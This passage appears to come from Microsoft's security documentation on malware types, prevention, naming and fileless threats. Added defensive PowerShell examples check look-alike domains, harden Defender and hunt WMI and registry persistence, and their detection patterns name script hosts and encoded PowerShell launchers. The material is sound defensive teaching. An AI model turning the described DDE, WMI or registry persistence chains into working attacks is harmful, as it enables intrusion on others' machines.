
Contents

Security intelligence
Understand malware & other threats
Prevent malware infection
Malware names
Coin miners
Exploits and exploit kits
Fileless threats
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms
How Microsoft identifies malware and PUA
Submit files for analysis
Safety Scanner download
Industry tests
Industry collaboration programs
Virus information alliance
Microsoft virus initiative
Coordinated malware eradication
Information for developers
Software developer FAQ
Software developer resources
Security intelligence
4/5/2019 • 2 minutes to read • Edit Online

Here you will find information about different types of malware, safety tips on how you can protect your
organization, and resources for industry collaboration programs.
Understand malware & other threats
How Microsoft identifies malware and PUA
Submit files for analysis
Safety Scanner download
Keep up with the latest malware news and research. Check out our Windows security blogs and follow us on
Twitter for the latest news, discoveries, and protections.
Learn more about Windows security.
Understanding malware & other threats
4/8/2019

Malware is a term used to describe malicious applications and code that can cause damage and disrupt normal use
of devices. Malware can allow unauthorized access, use system resources, steal passwords, lock you out of your
computer and ask for ransom, and more.
Cybercriminals that distribute malware are often motivated by money and will use infected computers to launch
attacks, obtain banking credentials, collect information that can be sold, sell access to computing resources, or
extort payment from victims.
As criminals become more sophisticated with their attacks, Microsoft is here to help. Windows 10 is the most
secure version of Windows yet and includes many features to help protect you whether you're at home, at work, or
on the go. With Windows Defender Advanced Threat Protection (Windows Defender ATP ), businesses can stay
protected with next-generation protection and other security capabilities.
For good general tips, check out the prevent malware infection topic.
There are many types of malware, including:
Coin miners
Exploits and exploit kits
Macro malware
Phishing
Ransomware
Rootkits
Supply chain attacks
Tech support scams
Trojans
Unwanted software
Worms
Prevent malware infection
4/8/2019

Malware authors are always looking for new ways to infect computers. Follow the simple tips below to stay
protected and minimize threats to your data and accounts.

Keep software up-to-date


Exploits typically use vulnerabilities in popular software such as web browsers, Java, Adobe Flash Player, and
Microsoft Office to infect devices. Software updates patch vulnerabilities so they aren't available to exploits
anymore.
To keep Microsoft software up to date, ensure that automatic Microsoft Updates are enabled. Also, upgrade to the
latest version of Windows to benefit from a host of built-in security enhancements.

Be wary of links and attachments


Email and other messaging tools are among the most common ways a device gets infected. Attachments or
links in messages can open malware directly or stealthily trigger a download. Some emails instruct the
recipient to enable macros or other executable content, which makes it easier for malware to infect the
device.
Use an email service that provides protection against malicious attachments, links, and abusive senders.
Microsoft Office 365 has built-in antimalware, link protection, and spam filtering.
For more information, see phishing.

Watch out for malicious or compromised websites


By visiting malicious or compromised sites, your device can get infected with malware automatically or you can
get tricked into downloading and installing malware. See exploits and exploit kits as an example of how some of
these sites can automatically install malware to visiting computers.
To identify potentially harmful websites, keep the following in mind:
The registrable domain (the part of the address just before the top-level domain, such as example.com)
should belong to the company whose site you think you are visiting. Subdomains to the left of it prove
nothing: example.com.evil.net is run by whoever owns evil.net. Check the domain for misspellings. Malicious
sites commonly register domain names that swap the letter O with a zero (0) or the letters L and I with a
one (1). If example.com is spelled examp1e.com, the site you are visiting is suspect.
Sites that aggressively open popups and display misleading buttons often trick users into accepting
content through constant popups or mislabeled buttons.
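The following PowerShell function applies the two checks above to a URL: it isolates the registrable domain (so a brand name hidden in a subdomain is not mistaken for the brand) and folds the common look-alike substitutions before comparing against a list of trusted domains. It is an added example, not code from the original page; the trusted-domain list, the substitution table, and the sample URLs are constructed for the example, and the two-label rule for the registrable domain does not handle public suffixes such as co.uk.

```powershell
# Added example (not from the original page): flag look-alike domains by folding common
# character swaps before comparing the registrable domain against trusted brands.
# The trusted list and the sample URLs are constructed for this example.
$TrustedDomains = @('example.com', 'microsoft.com', 'contoso.com')

function Get-RegistrableDomain {
    param([Parameter(Mandatory)][string]$Url)
    # Last two labels of the host: good enough for .com/.net style TLDs; two-part
    # public suffixes such as co.uk would need a public-suffix list.
    $uri = [Uri]$Url
    $labels = $uri.Host.ToLowerInvariant().Split('.')
    if ($labels.Count -lt 2) { return $labels[0] }
    return ($labels[-2..-1] -join '.')
}

function ConvertTo-FoldedDomain {
    param([Parameter(Mandatory)][string]$Domain)
    # Map digits and letter pairs that imitate other letters onto the letter they imitate.
    # Order matters: "rn" must collapse to "m" before "i" is folded into "l".
    $folded = $Domain.ToLowerInvariant()
    foreach ($pair in @(@('rn', 'm'), @('vv', 'w'), @('0', 'o'), @('1', 'l'), @('i', 'l'))) {
        $folded = $folded.Replace($pair[0], $pair[1])
    }
    return $folded
}

function Test-LookalikeDomain {
    param([Parameter(Mandatory)][string]$Url, [string[]]$Trusted = $TrustedDomains)
    $domain = Get-RegistrableDomain -Url $Url
    $verdict = 'unknown'; $imitates = $null
    if ($Trusted -contains $domain) {
        $verdict = 'trusted'
    } else {
        $folded = ConvertTo-FoldedDomain -Domain $domain
        foreach ($t in $Trusted) {
            if ((ConvertTo-FoldedDomain -Domain $t) -eq $folded) {
                $verdict = 'lookalike'; $imitates = $t; break
            }
        }
    }
    [pscustomobject]@{ Url = $Url; Domain = $domain; Verdict = $verdict; Imitates = $imitates }
}

# Constructed sample input: a genuine site, an l->1 swap, an rn->m swap, and a brand
# name hidden in a subdomain (the registrable domain there is evil.net).
@('https://www.example.com/login',
  'https://examp1e.com/login',
  'https://rnicrosoft.com/account',
  'https://example.com.evil.net/login') |
    ForEach-Object { Test-LookalikeDomain -Url $_ } | Format-Table -AutoSize
```

The subdomain case comes back as "unknown" rather than "lookalike", which is the point: a filter that only searches the full host name for the brand string would pass it.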
To block malicious websites, use a modern web browser like Microsoft Edge which identifies phishing and
malware websites and checks downloads for malware.
If you encounter an unsafe site, click More [… ] > Send feedback on Microsoft Edge. You can also report unsafe
sites directly to Microsoft.
Pirated material on compromised websites
Using pirated content is not only illegal, it can also expose your device to malware. Sites that offer pirated
software and media are often used to distribute malware when the site is visited. Pirated software is also
sometimes bundled with malware and other unwanted software, including intrusive browser plugins and
adware.
Users do not openly discuss visits to these sites, so any untoward experiences are more likely to stay unreported.
To stay safe, download movies, music, and apps from official publisher websites or stores. Consider running a
streamlined OS such as Windows 10 in S mode, which only allows apps from the Microsoft Store to be
installed.

Don't attach unfamiliar removable drives


Some types of malware can spread by copying themselves to USB flash drives or other removable drives. There
are malicious individuals that intentionally prepare and distribute infected drives—leaving these drives in public
places to victimize unsuspecting individuals.
Only use removable drives that you are familiar with or that come from a trusted source. If a drive has been used
in publicly accessible devices, like computers in a café or a library, make sure you have antimalware running on
your computer before you use the drive. Avoid opening unfamiliar files you find on suspect drives, including
Office and PDF documents and executable files.

Use a non-administrator account


When malware is launched, whether inadvertently by a user or automatically, it usually runs with the same
privileges as the active user. By limiting account privileges you therefore limit what malware can change on a
device.
By default, Windows uses User Account Control (UAC) to provide automatic, granular control of privileges. An
administrator's session normally runs with a filtered, standard-user token, and UAC prompts for elevation every
time an application attempts to make potentially consequential changes to the system. Although UAC limits the
privileges of admin users, the user can simply approve the prompt, so it is quite easy for an admin user to
inadvertently allow malware to run with full privileges.
To help ensure that everyday activities do not result in malware infection and other potentially catastrophic
changes, it is recommended that you use a non-administrator account for regular use. By using a non-
administrator account, you can prevent installation of unauthorized apps and prevent inadvertent changes to
system settings. Avoid browsing the web or checking email using an account with administrator privileges.
Whenever necessary, log in as an administrator to install apps or make configuration changes that require admin
privileges.
Read about creating user accounts and giving administrator privileges
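The PowerShell below, added here as an example rather than taken from the page, shows the two sides of the advice above: a report of whether the current session is actually elevated (as opposed to merely belonging to an administrator behind UAC's filtered token), and the creation of a standard local account for everyday use. It assumes Windows 10 with the built-in LocalAccounts module; the account name "daily" is a placeholder, and membership through nested domain groups is not resolved.

```powershell
# Added example (not from the original page): report the privilege state of the current
# session and create a standard (non-administrator) user for everyday work.
function Get-PrivilegeReport {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    $adminRole = [Security.Principal.WindowsBuiltInRole]::Administrator
    # Direct members of the local Administrators group, as "MACHINE\name" or "DOMAIN\name".
    $admins = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
                ForEach-Object { $_.Name })
    [pscustomobject]@{
        User        = $identity.Name
        # True only when this process token holds the Administrators SID enabled,
        # i.e. the session has been elevated past UAC.
        Elevated    = $principal.IsInRole($adminRole)
        # True when the account is an admin even though this process may be running
        # with UAC's filtered token. Browsing or reading mail here is the risk case.
        AdminMember = ($admins -contains $identity.Name)
    }
}

function New-StandardUser {
    param([Parameter(Mandatory)][string]$Name)
    # Must be run from an elevated session. New-LocalUser does not place the account
    # in any group, so add it to Users explicitly (and never to Administrators).
    $password = Read-Host -Prompt "Password for $Name" -AsSecureString
    $user = New-LocalUser -Name $Name -Password $password
    Add-LocalGroupMember -Group 'Users' -Member $user
    return $user
}

Get-PrivilegeReport | Format-List
# One-time setup from an elevated prompt; the name is a placeholder:
#   New-StandardUser -Name 'daily'
```

A result of Elevated = False and AdminMember = True is the situation the text warns about: UAC is the only thing between a mistaken click and a fully privileged infection.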

Other safety tips


To further ensure that data is protected from malware as well as other threats:
Back up files. Follow the 3-2-1 rule: keep 3 copies of your data, on at least 2 different kinds of storage,
with at least 1 copy offsite or offline so that ransomware on the machine cannot reach it. OneDrive provides
cloud-based copies that can be accessed from multiple devices and helps recover damaged or lost files,
including files locked by ransomware.
Be wary when connecting to public hotspots, particularly those that do not require authentication.
Use strong passwords and enable multi-factor authentication.
Do not use untrusted devices to log on to email, social media, and corporate accounts.

Software solutions
Microsoft provides comprehensive security capabilities that help protect against threats. We recommend:
Automatic Microsoft updates keep software up-to-date to get the latest protections.
Controlled folder access stops ransomware in its tracks by preventing unauthorized access to your
important files. Controlled folder access locks down folders, allowing only authorized apps to access files.
Unauthorized apps, including ransomware and other malicious executable files, DLLs, and scripts are
denied access.
Microsoft Edge browser protects against threats such as ransomware by preventing exploit kits from
running. By using Microsoft SmartScreen, Microsoft Edge blocks access to malicious websites.
Microsoft Exchange Online Protection (EOP ) offers enterprise-class reliability and protection against spam
and malware, while maintaining access to email during and after emergencies.
Microsoft Safety Scanner helps remove malicious software from computers. NOTE: This tool does not
replace your antimalware product.
Microsoft 365 includes Office 365, Windows 10, and Enterprise Mobility + Security. These resources
power productivity while providing intelligent security across users, devices, and data.
Office 365 Advanced Threat Protection includes machine learning capabilities that block dangerous
emails, including millions of emails carrying ransomware downloaders.
OneDrive for Business can back up files, which you would then use to restore files in the event of an
infection.
Windows Defender Advanced Threat Protection provides comprehensive endpoint protection, detection,
and response capabilities to help prevent ransomware. In the event of a breach, Windows Defender ATP
alerts security operations teams about suspicious activities and automatically attempts to resolve the
problem. This includes alerts for suspicious PowerShell commands, connections to Tor sites, launching of
self-replicating copies, and deletion of volume shadow copies. Try Windows Defender ATP free of
charge.
Windows Hello for Business replaces passwords with strong two-factor authentication on your devices.
This authentication consists of a new type of user credential that is tied to a device and uses a biometric or
PIN. It lets users authenticate to an Active Directory or Azure Active Directory account.
Earlier than Windows 10 (not recommended)
Microsoft Security Essentials provides real-time protection for your home or small business device that
guards against viruses, spyware, and other malicious software.

What to do with a malware infection


The antivirus capabilities in Windows Defender ATP help reduce the chances of infection and automatically
remove the threats they detect.
In case threat removal is unsuccessful, read about troubleshooting malware detection and removal problems.
Malware names
4/8/2019

We name the malware and unwanted software that we detect according to the Computer Antivirus Research
Organization (CARO) malware naming scheme. The scheme uses the following format:
Type:Platform/Family.Variant!Suffix
For example, Trojan:Win32/Reveton.T!lnk names the type (Trojan), the platform (Win32), the family (Reveton),
the variant (T), and a suffix (!lnk).
When our analysts research a particular threat, they determine what each of the components of the name will
be.

Type
Describes what the malware does on your computer. Worms, viruses, trojans, backdoors, and ransomware are
some of the most common types of malware.
Adware
Backdoor
Behavior
BrowserModifier
Constructor
DDoS
Exploit
Hacktool
Joke
Misleading
MonitoringTool
Program
PWS
Ransom
RemoteAccess
Rogue
SettingsModifier
SoftwareBundler
Spammer
Spoofer
Spyware
Tool
Trojan
TrojanClicker
TrojanDownloader
TrojanNotifier
TrojanProxy
TrojanSpy
VirTool
Virus
Worm

Platforms
Indicates the operating system (such as Windows, Mac OS X, and Android) that the malware is designed to work
on. The platform is also used to indicate programming languages and file formats.
Operating systems
AndroidOS: Android operating system
DOS: MS-DOS platform
EPOC: Psion devices
FreeBSD: FreeBSD platform
iPhoneOS: iPhone operating system
Linux: Linux platform
MacOS: Mac OS 9.x platform or earlier
MacOS_X: MacOS X or later
OS2: OS2 platform
Palm: Palm operating system
Solaris: System V-based Unix platforms
SunOS: Unix platforms 4.1.3 or lower
SymbOS: Symbian operating system
Unix: general Unix platforms
Win16: Win16 (3.1) platform
Win2K: Windows 2000 platform
Win32: Windows 32-bit platform
Win64: Windows 64-bit platform
Win95: Windows 95, 98 and ME platforms
Win98: Windows 98 platform only
WinCE: Windows CE platform
WinNT: Windows NT platform
Scripting languages
ABAP: Advanced Business Application Programming scripts
ALisp: ALisp scripts
AmiPro: AmiPro script
ANSI: American National Standards Institute scripts
AppleScript: compiled Apple scripts
ASP: Active Server Pages scripts
AutoIt: AutoIT scripts
BAS: Basic scripts
BAT: Batch scripts
CorelScript: Corelscript scripts
HTA: HTML Application scripts
HTML: HTML scripts
INF: Install scripts
IRC: mIRC/pIRC scripts
Java: Java binaries (classes)
JS: Javascript scripts
LOGO: LOGO scripts
MPB: MapBasic scripts
MSH: Monad shell scripts
MSIL: .NET intermediate language scripts
Perl: Perl scripts
PHP: Hypertext Preprocessor scripts
Python: Python scripts
SAP: SAP platform scripts
SH: Shell scripts
VBA: Visual Basic for Applications scripts
VBS: Visual Basic scripts
WinBAT: Winbatch scripts
WinHlp: Windows Help scripts
WinREG: Windows registry scripts
Macros
A97M: Access 97, 2000, XP, 2003, 2007, and 2010 macros
HE: macro scripting
O97M: Office 97, 2000, XP, 2003, 2007, and 2010 macros - those that affect Word, Excel, and PowerPoint
PP97M: PowerPoint 97, 2000, XP, 2003, 2007, and 2010 macros
V5M: Visio5 macros
W1M: Word1Macro
W2M: Word2Macro
W97M: Word 97, 2000, XP, 2003, 2007, and 2010 macros
WM: Word 95 macros
X97M: Excel 97, 2000, XP, 2003, 2007, and 2010 macros
XF: Excel formulas
XM: Excel 95 macros
Other file types
ASX: XML metafile of Windows Media .asf files
HC: HyperCard Apple scripts
MIME: MIME packets
Netware: Novell Netware files
QT: Quicktime files
SB: StarBasic (StarOffice XML) files
SWF: Shockwave Flash files
TSQL: MS SQL server files
XML: XML files

Family
Grouping of malware based on common characteristics, including attribution to the same authors. Security
software providers sometimes use different names for the same malware family.

Variant letter
Used sequentially for every distinct version of a malware family. For example, the detection for the variant ".AF"
would have been created after the detection for the variant ".AE".

Suffixes
Provides extra detail about the malware, including how it is used as part of a multicomponent threat. For
example, in Trojan:Win32/Reveton.T!lnk, "!lnk" indicates that the threat component is a shortcut file used by
Trojan:Win32/Reveton.T.
.dam: damaged malware
.dll: Dynamic Link Library component of a malware
.dr: dropper component of a malware
.gen: malware that is detected using a generic signature
.kit: virus constructor
.ldr: loader component of a malware
.pak: compressed malware
.plugin: plug-in component
.remnants: remnants of a virus
.worm: worm component of that malware
!bit: an internal category used to refer to some threats
!cl: an internal category used to refer to some threats
!dha: an internal category used to refer to some threats
!pfn: an internal category used to refer to some threats
!plock: an internal category used to refer to some threats
!rfn: an internal category used to refer to some threats
!rootkit: rootkit component of that malware
@m: worm mailers
@mm: mass mailer worm
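The function below splits a detection name into the components described in this section. It is an added example, not a tool from the page or from Microsoft; the regular expression is my reading of the scheme as laid out above, and it also accepts the CVE-style family names used for exploits (for example Exploit:Java/CVE-2013-1489.A) discussed later on this page. Trojan:Win32/Reveton.T!lnk and Exploit:O97M/DDEDownloader.PA appear on this page; the other sample names are constructed.

```powershell
# Added example (not from the original page): parse a CARO-style detection name into
# Type, Platform, Family, Variant and any trailing suffix markers.
function ConvertFrom-DetectionName {
    param([Parameter(Mandatory, ValueFromPipeline)][string]$Name)
    process {
        # Type:Platform/Family[.Variant][suffixes]; suffixes are .xxx, !xxx or @m/@mm markers.
        # Variant letters are upper case; -cmatch keeps ".gen" from being read as a variant.
        $pattern = '^(?<Type>[A-Za-z]+):(?<Platform>[A-Za-z0-9_]+)/(?<Family>[A-Za-z0-9_-]+)' +
                   '(?:\.(?<Variant>[A-Z]{1,3}))?(?<Suffix>(?:[.!@][A-Za-z0-9]+)*)$'
        if ($Name -cnotmatch $pattern) {
            return [pscustomobject]@{ Name = $Name; Valid = $false; Type = $null; Platform = $null
                                      Family = $null; Variant = $null; Suffixes = @() }
        }
        $suffixes = @()
        if ($Matches.Suffix) {
            $suffixes = @([regex]::Matches($Matches.Suffix, '[.!@][A-Za-z0-9]+') |
                          ForEach-Object { $_.Value })
        }
        [pscustomobject]@{
            Name     = $Name
            Valid    = $true
            Type     = $Matches.Type
            Platform = $Matches.Platform
            Family   = $Matches.Family
            Variant  = $Matches.Variant      # $null when the name has no variant letter
            Suffixes = $suffixes             # e.g. @('.gen', '!A')
        }
    }
}

# Two names from this page, one CVE-style exploit name, one constructed name with a
# generic marker and a suffix, and one string that is not a detection name at all.
@('Trojan:Win32/Reveton.T!lnk',
  'Exploit:O97M/DDEDownloader.PA',
  'Exploit:Java/CVE-2013-1489.A',
  'Worm:Win32/Sample.gen!A',
  'not-a-detection-name') |
    ConvertFrom-DetectionName |
    Format-Table Name, Valid, Type, Platform, Family, Variant, @{ n = 'Suffixes'; e = { $_.Suffixes -join ' ' } } -AutoSize
```

The split is useful when normalising alerts from several engines: the Family field is the part to correlate on, while the Platform and Suffix fields say what kind of artifact (shortcut, DLL, dropper) was actually found.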
Coin miners
4/8/2019

Cybercriminals are always looking for new ways to make money. With the rise of digital currencies, also known as
cryptocurrencies, criminals see a unique opportunity to infiltrate an organization and secretly mine for coins by
repurposing malware to deliver miners.

How coin miners work


Many infections start with:
Email messages with attachments that try to install malware.
Websites hosting exploit kits that attempt to use vulnerabilities in web browsers and other software to
install coin miners.
Websites taking advantage of computer processing power by running scripts while users browse the
website.
Mining is the process of running complex mathematical calculations necessary to maintain the blockchain ledger.
This process generates coins but requires significant computing resources.
Coin miners are not inherently malicious. Some individuals and organizations invest in hardware and electric
power for legitimate coin mining operations. However, others look for alternative sources of computing power and
try to find their way into corporate networks. These coin miners are not wanted in enterprise environments
because they eat up precious computing resources.
Cybercriminals see an opportunity to make money by running malware campaigns that distribute, install, and run
trojanized miners at the expense of other people’s computing resources.
Examples
DDE abuse, which has been used to distribute ransomware, is now delivering miners. (Dynamic Data Exchange is a
legitimate Office feature: a DDE field in a document can launch an arbitrary command once the user accepts the
prompts, so it is detected as an exploit even though no memory-corruption bug is involved.)
For example, a sample of the malware detected as Trojan:Win32/Coinminer (SHA-256:
7213cbbb1a634d780f9bb861418eb262f58954e6e5dca09ca50c1e1324451293) is installed by
Exploit:O97M/DDEDownloader.PA, a Word document that contains a DDE field.
The DDE field launches PowerShell, which executes a malicious PowerShell script (Trojan:PowerShell/Maponeir.A);
the script then downloads the trojanized miner, a modified version of the miner XMRig, which mines Monero
cryptocurrency.

How to protect against coin miners


Enable PUA detection: Some coin mining tools are not considered malware but are detected as potentially
unwanted applications (PUA). Many applications detected as PUA can negatively impact machine performance and
employee productivity. In enterprise environments, you can stop adware, torrent downloaders, and coin mining by
enabling PUA detection.
Since coin miners are becoming a popular payload in many different kinds of attacks, see the general tips on how
to prevent malware infection.
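The PowerShell below, added as an example and not taken from the page, turns on PUA detection as recommended here and controlled folder access as described under Software solutions in the Prevent malware infection topic, allows one backup tool through, reads the settings back, and lists recent folder-access blocks from the Defender operational log. It assumes an elevated Windows PowerShell session on Windows 10 with Windows Defender Antivirus active; the path C:\Tools\backup.exe is a placeholder.

```powershell
# Added example (not from the original page): enable PUA blocking and controlled folder
# access, then verify the effective configuration. Requires an elevated session.
function Enable-DefenderHardening {
    param([string[]]$AllowedApps = @())
    # Block (not merely audit) potentially unwanted applications such as miners.
    Set-MpPreference -PUAProtection Enabled
    # Controlled folder access: only trusted apps may write to the protected folders.
    Set-MpPreference -EnableControlledFolderAccess Enabled
    foreach ($app in $AllowedApps) {
        # Add legitimate tools that must write to user folders (backup agents, etc.).
        Add-MpPreference -ControlledFolderAccessAllowedApplications $app
    }
    Get-MpPreference | Select-Object PUAProtection, EnableControlledFolderAccess,
        ControlledFolderAccessAllowedApplications, ControlledFolderAccessProtectedFolders
}

function Get-ControlledFolderAccessEvents {
    param([int]$Newest = 20)
    # 1123 = write blocked by controlled folder access, 1124 = would have been blocked
    # (audit mode). Useful for a dry run before switching from AuditMode to Enabled.
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 1123, 1124
    } -MaxEvents $Newest -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id, Message
}

# Start in audit mode if you are unsure which legitimate software writes to user folders:
#   Set-MpPreference -EnableControlledFolderAccess AuditMode
Enable-DefenderHardening -AllowedApps @('C:\Tools\backup.exe') | Format-List
Get-ControlledFolderAccessEvents | Format-Table -AutoSize
```

Running in AuditMode for a week and reviewing the 1124 events before enforcing is the usual way to avoid breaking a backup or sync agent that writes to Documents.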
For more information on coin miners, see the blog post Invisible resource thieves: The increasing threat of
cryptocurrency miners.
Exploits and exploit kits
4/8/2019

Exploits take advantage of vulnerabilities in software. A vulnerability is like a hole in your software that malware
can use to get onto your device. Malware exploits these vulnerabilities to bypass your computer's security
safeguards to infect your device.

How exploits and exploit kits work


Exploits are often the first part of a larger attack. Attackers scan for outdated systems that contain critical
vulnerabilities, which they then exploit by deploying targeted malware. Exploits often carry what's called
"shellcode": a small payload that runs once the vulnerability is triggered and is typically used to download
additional malware from attacker-controlled servers. This allows attackers to infect devices and infiltrate
organizations.
Exploit kits are more comprehensive tools that contain a collection of exploits. These kits probe a visiting device
for different kinds of software vulnerabilities and, if any are found, deploy additional malware to further infect it.
Kits can use exploits targeting a variety of software, including Adobe Flash Player, Adobe Reader, Internet
Explorer, and Oracle (formerly Sun) Java.
The most common method used by attackers to distribute exploits and exploit kits is through webpages, but
exploits can also arrive in emails. Some websites unknowingly and unwillingly host malicious code and exploits in
their ads.
The infographic below shows how an exploit kit might attempt to exploit a device when a compromised webpage
is visited.

Figure 1. Example of how exploit kits work


Several notable threats, including WannaCry, exploit the Server Message Block (SMB) vulnerability CVE-2017-0144
to launch malware.
Examples of exploit kits:
Angler / Axpergle
Neutrino
Nuclear
To learn more about exploits, read this blog post on taking apart a double zero-day sample discovered in joint
hunt with ESET.

How we name exploits


We categorize exploits in our Malware encyclopedia by the "platform" they target. For example,
Exploit:Java/CVE-2013-1489.A is an exploit that targets a vulnerability in Java.
A project called "Common Vulnerabilities and Exposures (CVE)" is used by many security software vendors. The
project gives each vulnerability a unique identifier, for example, CVE-2016-0778. The portion "2016" is the year in
which the identifier was assigned or the vulnerability was made public (not necessarily the year it was
discovered). The "0778" is a sequence number for this specific vulnerability; since 2014 it can have four or more
digits.
You can read more on the CVE website.

How to protect against exploits


The best prevention for exploits is to keep your organization's software up to date. Software vendors provide
updates for many known vulnerabilities and making sure these updates are applied to all devices is an important
step to prevent malware.
For more general tips, see prevent malware infection.
Fileless threats
4/8/2019

What exactly is a fileless threat? The term "fileless" suggests a threat that does not come in a file, such as a
backdoor that lives only in the memory of a machine. However, there is no generally accepted definition. The
term is used broadly; it is also used to describe malware families that do rely on files in order to operate.
Given that attacks involve several stages for functionalities like execution, persistence, information theft, lateral
movement, communication with command-and-control, etc., some parts of the attack chain may be fileless, while
others may involve the filesystem in some form or another.
To shed light on this loaded term, we grouped fileless threats into different categories.

Figure 1. Comprehensive diagram of fileless malware


We can classify fileless threats by their entry point, which indicates how fileless malware can arrive on a machine:
via an exploit; through compromised hardware; or via regular execution of applications and scripts.
Next, we can list the form of entry point: for example, exploits can be based on files or network data; PCI
peripherals are a type of hardware vector; and scripts and executables are sub-categories of the execution vector.
Finally, we can classify the host of the infection: for example, a Flash application that may contain an exploit; a
simple executable; a malicious firmware from a hardware device; or an infected MBR, which could bootstrap the
execution of a malware before the operating system even loads.
This helps us divide and categorize the various kinds of fileless threats. Clearly, the categories are not all the same:
some are more dangerous but also more difficult to implement, while others are more commonly used despite (or
precisely because of) not being very advanced.
From this categorization, we can glean three big types of fileless threats based on how much of a footprint they
may leave on infected machines.

Type I: No file activity performed


A completely fileless malware can be considered one that never requires writing a file on the disk. How would such
malware infect a machine in the first place? An example scenario could be a target machine receiving malicious
network packets that exploit the EternalBlue vulnerability, leading to the installation of the DoublePulsar backdoor,
which ends up residing only in the kernel memory. In this case, there is no file or any data written on a file.
Another scenario could involve compromised devices, where malicious code could be hiding in device firmware
(such as a BIOS), a USB peripheral (like the BadUSB attack), or even in the firmware of a network card. None of
these examples require a file on the disk in order to run; the firmware variants live in non-volatile storage outside
the file system and survive even reboots, disk reformats, and OS reinstalls.
Infections of this type can be extra difficult to detect and remediate. Antivirus products usually don't have the
capability to access firmware for inspection; even if they did, it would be extremely challenging to detect and
remediate threats at this level. Because this type of fileless malware requires high levels of sophistication and often
depends on a particular hardware or software configuration, it's not an attack vector that can be exploited easily
and reliably. For this reason, while extremely dangerous, threats of this type tend to be very uncommon and not
practical for most attacks.

Type II: Indirect file activity


There are other ways that malware can achieve fileless presence on a machine without requiring significant
engineering effort. Fileless malware of this type doesn't directly write files on the file system, but it can end up
using files indirectly. This is the case for the POSHSPY backdoor. Attackers stored a malicious PowerShell
command in the WMI repository and configured a WMI event filter, consumer, and binding to run that command
periodically.
It’s possible to carry out such installation via command line without requiring the presence of the backdoor to be
on a file in the first place. The malware can thus be installed and theoretically run without ever touching the file
system. However, the WMI repository is stored on a physical file that is a central storage area managed by the CIM
Object Manager and usually contains legitimate data. Therefore, while the infection chain does technically use a
physical file, for practical purposes it’s considered a fileless attack given that the WMI repository is a multi-purpose
data container that cannot be simply detected and removed.
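Because the three pieces of such a subscription (the event filter, the consumer holding the command, and the binding that ties them together) all live in the root\subscription namespace, they can be enumerated directly. The PowerShell below, an added example and not code from the page, lists every binding with its trigger query and payload and flags the patterns typical of this technique. It assumes an elevated Windows PowerShell session; the flagging heuristics are my own and will also surface legitimate subscriptions such as SCCM's.

```powershell
# Added example (not from the original page): enumerate WMI event subscriptions and flag
# the ones that look like PowerShell launchers on a polling trigger.
function Get-RefName {
    param($Ref)
    # Get-WmiObject returns the Filter/Consumer references as strings such as
    # __EventFilter.Name="name"; extract the key. Fall back to a Name property.
    if ($Ref -is [string]) { return ($Ref -replace '^.*Name="([^"]*)".*$', '$1') }
    return $Ref.Name
}

function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    # Querying the abstract base class returns every derived consumer (CommandLine,
    # ActiveScript, LogFile, NTEventLog, SMTP).
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)
    $bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        $f = $filters   | Where-Object { $_.Name -eq (Get-RefName $b.Filter) }
        $c = $consumers | Where-Object { $_.Name -eq (Get-RefName $b.Consumer) }
        # CommandLineEventConsumer carries CommandLineTemplate; ActiveScriptEventConsumer
        # carries ScriptText or ScriptFileName. Properties absent on a class yield $null.
        $payload = (@($c.CommandLineTemplate, $c.ScriptText, $c.ScriptFileName) -join ' ').Trim()
        $flags = @()
        if ($payload -match '(?i)powershell|(^|\s)-e(c|nc|ncodedcommand)?\b|FromBase64String') { $flags += 'powershell-launcher' }
        if ($payload -match '(?i)mshta|wscript|cscript|regsvr32|rundll32') { $flags += 'script-host' }
        # Periodic "every N seconds" triggers are the usual way to re-run the backdoor.
        if ($f.Query -match '(?i)__InstanceModificationEvent|WITHIN') { $flags += 'polling-trigger' }
        [pscustomobject]@{
            Filter   = $f.Name
            Query    = $f.Query
            Consumer = $c.Name
            Class    = $c.__CLASS
            Payload  = $payload
            Flags    = ($flags -join ', ')
        }
    }
}

Get-WmiPersistence | Format-List
# Removal order for a confirmed malicious subscription: the binding first, then the
# consumer, then the filter, each via:  $object | Remove-WmiObject
```

An entry whose consumer is a CommandLineEventConsumer with an encoded PowerShell command and whose filter fires on __InstanceModificationEvent every few seconds is exactly the shape the section describes; nothing about it appears on disk as a separate file.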

Type III: Files required to operate


Some malware can have some sort of fileless persistence but cannot operate without using files. An example is
Kovter, which creates a shell open verb handler in the registry for a random file extension. As a result, opening a
file with that extension leads to the execution of a script through the legitimate tool mshta.exe.
Figure 2. Kovter’s registry key
When the open verb is invoked, the associated command from the registry is launched, which results in the
execution of a small script. This script reads data from a further registry key and executes it, in turn leading to the
loading of the final payload. However, to trigger the open verb in the first place, Kovter has to drop a file with the
same extension targeted by the verb (in the example above, the extension is .bbf5590fd). It also has to set an auto-
run key configured to open such file when the machine starts.
Despite the use of files, and despite the fact that the registry too is stored in physical files, Kovter is considered a
fileless threat because the file system is of no practical use: the files with random extension contain junk data that is
not usable in verifying the presence of the threat, and the files that store the registry are containers that cannot be
detected and deleted if malicious content is present.
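The chain above leaves two registry artifacts that can be hunted for: a file-type handler whose open command invokes a script host, and an autorun entry that merely "opens" a file with that extension. The PowerShell below, an added example and not code from the page, walks the class hives and the Run keys looking for both. The list of script hosts and the test for an odd extension (long, digit-heavy, like .bbf5590fd) are my own heuristics; legitimate handlers such as .js or .vbs will also be listed, which is why the OddExtension column is there.

```powershell
# Added example (not from the original page): find shell open-verb handlers that run a
# script host, and Run entries that rely on such a handler.
$ScriptHosts = 'mshta|wscript|cscript|powershell|cmd\.exe|rundll32|regsvr32|javascript:|vbscript:'

function Get-OpenCommand {
    param([string]$KeyPath)
    # (default) value of <key>\shell\open\command, or $null when the key is absent.
    (Get-ItemProperty -Path "$KeyPath\shell\open\command" -ErrorAction SilentlyContinue).'(default)'
}

function Get-SuspiciousShellVerbs {
    # HKCR merges the machine-wide and the per-user class hives; check the per-user hive
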